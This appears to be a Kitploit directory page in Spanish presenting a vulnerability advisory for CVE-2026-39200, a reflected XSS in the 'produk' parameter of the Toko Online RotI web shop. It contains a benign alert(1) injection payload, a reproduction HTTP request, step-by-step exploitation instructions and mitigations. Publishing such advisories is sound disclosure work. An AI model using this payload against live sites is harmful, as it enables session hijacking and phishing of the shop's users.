Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39200 — El valor del parámetro de solicitud `produk` se copia en el valor de un atributo de etiqueta HTML que está encapsulado entre comillas dobles. El payload `xbnw0"><script>alert(1)</script>skc2h` fue enviado en el parámetro `produk`. Esta entrada se reflejó como `xbnw0\"><script>alert(1)</script>skc2h` en la respuesta de la aplicación. | Kitploit
Herramientas/GitHubGitHub/r00tali/cve-2026-39200
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubr00tali/cve-2026-39200

CVE-2026-39200

Ver Repositorio
13hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

El valor del parámetro de solicitud `produk` se copia en el valor de un atributo de etiqueta HTML que está encapsulado entre comillas dobles. El payload `xbnw0"><script>alert(1)</script>skc2h` fue enviado en el parámetro `produk`. Esta entrada se reflejó como `xbnw0\"><script>alert(1)</script>skc2h` en la respuesta de la aplicación.

Compartir

CVE-2026-39200 — Cross-Site Scripting (XSS) Reflejado en Toko Online RotI

Resumen

Se identificó una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en el parámetro de solicitud produk de la aplicación web Toko Online RotI. La aplicación no codifica en HTML la entrada proporcionada por el usuario antes de reflejarla dentro de un atributo de etiqueta HTML que está encapsulado entre comillas dobles. Un atacante puede crear una URL maliciosa que, al ser visitada por una víctima, ejecuta JavaScript arbitrario en el contexto de la sesión del navegador de la víctima.

CampoValor
ID CVECVE-2026-39200
Tipo de VulnerabilidadCWE-79 — Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (XSS Reflejado)
Producto AfectadoToko Online RotI (tienda online indonesia)
Parámetro Afectadoproduk
DescubridorUzair Ali (r00tali) — Probador de Penetración / Cazador de Bug Bounties
Fecha de Descubrimiento2026-07-03
CVE Asignado2026-07-12
Aviso Publicado2026-07-19

Detalles de la Vulnerabilidad

El parámetro de solicitud produk se copia textualmente dentro del valor de un atributo de etiqueta HTML encerrado entre comillas dobles. Debido a que la aplicación no codifica en HTML la entrada proporcionada por el usuario antes de reflejarla, un atacante puede salir del atributo enviando un payload que contenga una comilla doble de cierre seguida de un payload HTML/JavaScript.

Payload de Prueba de Concepto

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

Cuando este payload se envía como el parámetro produk, la aplicación devuelve la entrada en la respuesta sin escapar. El "> de cierre termina el atributo original, y el bloque inyectado <script>alert(1)</script> es interpretado por el navegador como un nuevo elemento HTML, ejecutando JavaScript arbitrario en la sesión del usuario.

Patrón Vulnerable (Conceptual)

La respuesta HTML vulnerable se ve así:

root@kitploit:~
<!-- ANTES de la inyección -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- DESPUÉS de la inyección con el payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            El navegador ejecuta esto

Solicitud HTTP (Reproducción)

root@kitploit:~
GET /[endpoint-vulnerable]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [host-objetivo]
User-Agent: Mozilla/5.0

Respuesta HTTP (Extracto)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

Pasos de Reproducción

  1. Identifique un endpoint en la aplicación Toko Online RotI que refleje el parámetro produk dentro de un atributo HTML (por ejemplo, una página de búsqueda, detalle o filtro de productos).
  2. Reemplace el valor del parámetro produk con el siguiente payload:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. Envíe la solicitud al servidor.
  4. Inspeccione la respuesta del servidor. El payload se devuelve sin modificar dentro del atributo, saliendo de las comillas " y produciendo un elemento <script> válido en el DOM.
  5. Cargue la respuesta manipulada en cualquier navegador moderno. Aparecerá un cuadro de diálogo JavaScript alert(1), confirmando la ejecución de JavaScript arbitrario en la sesión de la víctima.

Impacto

Una explotación exitosa de este XSS reflejado permite a un atacante:

  • Robar cookies de sesión y tokens de autenticación, lo que lleva a la toma de control de la cuenta.
  • Realizar acciones en nombre de usuarios autenticados sin su conocimiento.
  • Redirigir a los usuarios a sitios maliciosos (phishing / recolección de credenciales).
  • Inyectar contenido malicioso en la aplicación (defacement).
  • Capturar pulsaciones de teclas y datos de formularios enviados por la víctima.
  • Explotar vulnerabilidades del navegador para la entrega de malware drive-by.
  • Abusar de la relación de confianza entre el usuario y el dominio de la aplicación.

Debido a que la vulnerabilidad es reflejada, la explotación solo requiere que una víctima haga clic en un enlace manipulado, lo que la hace trivialmente armable en campañas de phishing.

CVSS v3.1 (estimado): 6.1 (Medio) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Mitigación

Para remediar esta vulnerabilidad, el proveedor debería:

  1. Codificar en HTML todos los valores proporcionados por el usuario antes de reflejarlos en la salida HTML. Codificar específicamente <, >, ", ' y & (por ejemplo, &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. Usar las ayudas de codificación de salida integradas del framework en lugar de la concatenación manual. Ejemplos:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) o sintaxis <%: %>
    • Python (Jinja2): {{ input }} (escapado automático por defecto)
  3. Establecer un encabezado de respuesta Content-Security-Policy (CSP) estricto para limitar el impacto de cualquier inyección restante:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. Establecer las banderas HttpOnly y Secure en todas las cookies de sesión para evitar que JavaScript las lea.
  5. Validar el parámetro produk contra una lista blanca de identificadores de producto esperados (IDs numéricos, slugs, etc.) y rechazar cualquier cosa que no coincida.
  6. Agregar X-Content-Type-Options: nosniff para evitar la detección de tipo MIME de los cuerpos de respuesta.

Cronología de Divulgación

FechaEvento
2026-07-03Vulnerabilidad descubierta durante pruebas de seguridad autorizadas
2026-07-03ID CVE solicitado a MITRE a través de cveform.mitre.org
2026-07-12CVE-2026-39200 asignado por el Equipo de Asignación de MITRE
2026-07-19Aviso público publicado

Descubridor

** Uzair Ali (r00tali)** — Probador de Penetración / Cazador de Bug Bounties / Investigador de Seguridad

  • GitHub: https://github.com/r00tali

Referencias

  • OWASP — Cross-Site Scripting (XSS)
  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • PortSwigger — Reflected XSS
  • MITRE CVE Record — CVE-2026-39200

Aviso Legal

Este aviso se publica únicamente con fines educativos y defensivos. La vulnerabilidad se reportó a través del proceso de divulgación responsable mediante el Equipo de Asignación de CVE de MITRE. No se divulga información confidencial del proveedor, datos de clientes ni código propietario. La prueba de concepto utiliza un payload benigno alert(1) y tiene como objetivo demostrar la existencia del error, no facilitar ataques contra el servicio en vivo.

Descargar herramienta